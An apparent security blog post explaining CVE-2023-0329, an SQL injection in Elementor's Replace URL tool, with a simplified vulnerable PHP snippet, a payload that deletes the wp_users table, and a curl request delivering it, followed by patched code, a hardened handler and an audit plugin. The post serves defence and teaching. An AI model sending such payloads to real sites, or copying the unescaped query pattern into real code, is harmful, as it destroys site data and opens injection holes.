If you run a WordPress site, chances are you’ve at least heard of Elementor — it’s the go-to plugin for easy, drag-and-drop website building. But in early 2023, researchers uncovered a serious flaw: CVE-2023-0329. This SQL injection vulnerability lurked in the “Replace URL” tool, letting an authenticated administrator do things they shouldn’t, like running arbitrary SQL commands on the site’s database.

In this exclusive long-read, we’ll break down what went wrong, explore exploit code, and see how to stay safe if you still use Elementor.

What is CVE-2023-0329?

CVE-2023-0329 is a vulnerability in Elementor Website Builder (before version 3.12.2). It allows an attacker with administrator access to exploit improper input handling in the Replace URL tool, resulting in SQL injection.

- Vulnerable code: Fails to sanitize and escape the Replace URL parameter before using it in a SQL statement.

- Impact: Any administrator, or anyone who can masquerade as one, could execute SQL commands — extract sensitive data, modify the database, or even bring down your site.

> References:  
> WPScan Advisory  
> NVD - CVE-2023-0329  
> Elementor Changelog

How Does It Happen?

The Replace URL tool lets admins swap out URLs in the database — handy for moving domains, but also a risk if you don’t treat user input with suspicion. Here’s roughly how the function works (simplified):

// Vulnerable snippet (simplified)
global $wpdb;
// $_POST values are attacker-controlled, even when the attacker is an admin
$old_url = $_POST['old_url'];
$new_url = $_POST['new_url'];

// Direct use - BAD! The values are interpolated into the SQL string,
// so a single quote in either one terminates the string literal
$query = "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, '$old_url', '$new_url')";
$wpdb->query($query);

See the problem? The variables are inserted directly into SQL, with no sanitization or escaping. That lets a malicious admin sneak SQL into those variables.

- Attacker role: Must be logged in as an Administrator.

- Why still dangerous? Some plugin or theme flaws let attackers escalate privileges to admin. Or, in multi-admin sites, an insider could turn evil.

Let’s say an attacker submits the following as the old_url parameter:

'; DELETE FROM wp_users WHERE 1=1; --

When substituted into the SQL statement, it becomes:

UPDATE wp_posts SET post_content = REPLACE(post_content, ''; DELETE FROM wp_users WHERE 1=1; --', '$new_url');

The SQL interpreter runs everything up to the semicolon, then executes the DELETE — wiping your entire user table! One practical caveat: WordPress’s $wpdb sends each call through a single-statement database API, so the driver will often reject a stacked second statement like this DELETE. That does not make the bug safe; the attacker still controls the contents of the UPDATE itself, which is why the fix has to remove the injection point rather than rely on driver behaviour.

Here’s a basic POST request exploit example (using curl):

curl -X POST -d "old_url=%27%3B+DELETE+FROM+wp_users+WHERE+1%3D1%3B+--&new_url=anything" \
  -b "your-admin-cookie-here" \
  https://example.com/wp-admin/admin-ajax.php?action=elementor_replace_url

Note: You’d need a valid session cookie for an administrator, but any existing site administrator already has one, and anyone who has escalated to that role can obtain one just as easily.

Real-World Risks and Attack Scenarios

- Privilege Escalation Chains: If another bug lets someone create an admin account, chaining into CVE-2023-0329 means full site compromise.
- Internal Threat: In organizations with multiple admins (like agencies or hosting providers), a rogue insider could exfiltrate data or destroy content.
- Mass Exploitation: Attackers could automate privilege escalations with known bugs, install backdoors, or ransom/delete content.

How Was It Fixed?

Elementor patched this vulnerability in version 3.12.2 by changing how the parameters are handled. The safe version sanitizes the inputs and passes them to $wpdb->prepare(), which quotes and escapes them before they reach the SQL statement:

// Patched version (simplified)
// sanitize_text_field() strips tags, control characters and surrounding whitespace.
// No esc_sql() here: $wpdb->prepare() already escapes %s values, and escaping
// twice would corrupt legitimate input containing quotes or backslashes.
$old_url = sanitize_text_field( $_POST['old_url'] );
$new_url = sanitize_text_field( $_POST['new_url'] );
// %s placeholders are replaced by quoted, escaped values, so the user input
// can never close the string literal and append its own SQL
$query = $wpdb->prepare(
    "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, %s, %s)",
    $old_url,
    $new_url
);
$wpdb->query($query);

By using WordPress’s built-in functions, the risk of SQL injection is squashed.
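To show the full defensive shape of such a handler (not just the query), here is an added example written for this post; it is not Elementor’s code. It keeps the same UPDATE as the snippets above but adds the checks a WordPress AJAX endpoint needs before it ever touches the database. The hook name `wp_ajax_example_safe_replace_url`, the nonce action `example_safe_replace_url` and the function names are hypothetical.

```php
<?php
// Added example: a hardened Replace URL handler in the shape of the page's
// snippets. Not Elementor's code; hook name, nonce action and function
// names are hypothetical.

add_action( 'wp_ajax_example_safe_replace_url', 'example_safe_replace_url' );

/**
 * Validate one URL parameter. Returns the clean URL, or null when the value
 * is missing or is not a well-formed http(s) URL. Quotes, semicolons and
 * SQL comment markers never appear in a legitimate URL, so the page's
 * payload ('; DELETE FROM wp_users WHERE 1=1; --) is rejected here.
 */
function example_validate_url_param( $raw ) {
    if ( ! is_string( $raw ) ) {
        return null;
    }
    // wp_unslash() undoes the slashes WordPress adds to $_POST;
    // sanitize_text_field() strips tags, control chars and whitespace.
    $value = sanitize_text_field( wp_unslash( $raw ) );
    if ( '' === $value || false === filter_var( $value, FILTER_VALIDATE_URL ) ) {
        return null;
    }
    $scheme = strtolower( (string) wp_parse_url( $value, PHP_URL_SCHEME ) );
    if ( ! in_array( $scheme, array( 'http', 'https' ), true ) ) {
        return null;
    }
    return $value;
}

function example_safe_replace_url() {
    global $wpdb;

    // 1. CSRF protection: the request must carry a nonce issued for this action.
    check_ajax_referer( 'example_safe_replace_url', '_nonce' );

    // 2. Authorization: only users allowed to manage the site may run this.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }

    // 3. Input validation: refuse anything that is not a plain URL, and log
    //    the rejection so repeated attempts stand out in the PHP error log.
    $old_url = example_validate_url_param( $_POST['old_url'] ?? null );
    $new_url = example_validate_url_param( $_POST['new_url'] ?? null );
    if ( null === $old_url || null === $new_url ) {
        error_log( sprintf(
            'replace_url: rejected non-URL input from user %d (ip %s)',
            get_current_user_id(),
            isset( $_SERVER['REMOTE_ADDR'] ) ? $_SERVER['REMOTE_ADDR'] : 'unknown'
        ) );
        wp_send_json_error( 'Both parameters must be valid http(s) URLs.', 400 );
    }

    // 4. Parameterized query: %s placeholders are quoted and escaped by
    //    $wpdb->prepare(), so the values can never terminate the literal.
    //    No esc_sql() here: escaping before prepare() would double-escape.
    $rows = $wpdb->query( $wpdb->prepare(
        "UPDATE {$wpdb->posts} SET post_content = REPLACE(post_content, %s, %s)",
        $old_url,
        $new_url
    ) );

    if ( false === $rows ) {
        wp_send_json_error( 'Database error.', 500 );
    }
    wp_send_json_success( array( 'rows_affected' => (int) $rows ) );
}
```

The order matters: the nonce and capability checks run before any input is read, the validator narrows the input to the only shape the tool legitimately needs, and the parameterized query is the last line of defence rather than the only one. The error_log() call gives an incident responder something to search for after the fact.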

How to Stay Safe

- Update Elementor to version 3.12.2 or later.
- Remove unnecessary administrator accounts.
- Limit plugin installation/update rights.
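As an added example for the steps above (not part of the original post or of Elementor), the following must-use plugin audits a site for the three points at once: an affected Elementor version, more administrator accounts than expected, and dashboard plugin installs left open. ELEMENTOR_VERSION is the real constant Elementor defines when active and DISALLOW_FILE_MODS is the real wp-config.php constant that blocks plugin/theme installs from the dashboard; the function name and the default admin threshold of 2 are hypothetical.

```php
<?php
// Added example: dashboard audit for CVE-2023-0329 mitigations.
// Not Elementor's code; the function name and threshold are hypothetical.
// Drop into wp-content/mu-plugins/ to get a warning notice in wp-admin.

/**
 * Returns an array of human-readable findings; empty when nothing needs attention.
 */
function example_cve_2023_0329_audit( $max_admins = 2 ) {
    $findings = array();

    // Elementor defines ELEMENTOR_VERSION when it is active.
    if ( defined( 'ELEMENTOR_VERSION' )
        && version_compare( ELEMENTOR_VERSION, '3.12.2', '<' ) ) {
        $findings[] = sprintf(
            'Elementor %s is installed; versions before 3.12.2 are affected by CVE-2023-0329. Update now.',
            ELEMENTOR_VERSION
        );
    }

    // Every administrator account is a potential entry point for an admin-only bug.
    $admins = get_users( array(
        'role'   => 'administrator',
        'fields' => array( 'ID', 'user_login' ),
    ) );
    if ( count( $admins ) > $max_admins ) {
        $findings[] = sprintf(
            '%d administrator accounts (%s); review and remove any that are not needed.',
            count( $admins ),
            implode( ', ', wp_list_pluck( $admins, 'user_login' ) )
        );
    }

    // DISALLOW_FILE_MODS removes plugin/theme install and update rights from the
    // dashboard for everyone, so updates must then be applied by deployment.
    if ( ! defined( 'DISALLOW_FILE_MODS' ) || ! DISALLOW_FILE_MODS ) {
        $findings[] = 'Any administrator can install plugins from the dashboard; consider DISALLOW_FILE_MODS if updates are deployed another way.';
    }

    return $findings;
}

add_action( 'admin_notices', function () {
    if ( ! current_user_can( 'manage_options' ) ) {
        return;
    }
    foreach ( example_cve_2023_0329_audit() as $finding ) {
        printf( '<div class="notice notice-warning"><p>%s</p></div>', esc_html( $finding ) );
    }
} );
```

The notice only appears for users who can already manage the site, and the findings are escaped with esc_html() before output so the audit itself cannot become an injection point.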

Final Thoughts

CVE-2023-0329 highlights how even trusted plugins can fall prey to classic bugs like SQL injection — and why WordPress admins should never delay updates. Even “admin-only” functions can be weaponized in the right attack scenario.

If you’re running Elementor, update now.  
Keep your site (and your users) safe!


*Exclusive for this post: If you found this useful, don’t keep it to yourself — send it to your dev team or WordPress admin friends, and keep your WordPress fortress secure!*

Timeline

Published on: 05/30/2023 08:15:00 UTC
Last modified on: 06/03/2023 04:18:00 UTC